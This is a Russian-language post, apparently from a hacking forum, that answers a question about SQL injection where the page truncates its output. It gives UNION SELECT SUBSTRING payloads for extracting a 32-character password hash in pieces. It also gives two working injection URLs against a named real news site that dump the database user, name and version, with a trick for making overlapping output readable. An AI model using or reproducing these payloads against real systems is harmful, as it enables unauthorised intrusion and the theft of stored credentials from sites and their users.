|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Gorev
Не вполне понял вопрос.
Если скрипт обрезает выводимые данные, допустим до 15 символов, то , как тут уже сказали, SUBSTRING. Выглядеть это будет примерно так(для хеша 32):
1-е 15 символов
union select SUBSTRING(passwd, 0, 15) from user
c 15 по 30
SUBSTRING(passwd, 15, 30)
и остальные 2
SUBSTRING(passwd, 30, 32)
========================
Иногда встречается "наложение" вывода, ну например сдесь:
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,User(),Database(),Ve rsion()),2,3,4,5,6,7,8,9/*
Вот так нам не видно юзера
http://presscenter.kz/index.php?show=news&id=-1+union+select+concat_ws(0x3a,0x6C6F6C6F6C6F,User( ),Database(),Version()),2,3,4,5,6,7,8,9/*
А вот так видно всё
========================
Если на вопрос не ответил, поподробнее опиши проблему, что выводится, что не выводится, при каких условиях, и чем тебя SUBSTRING не устраивает
|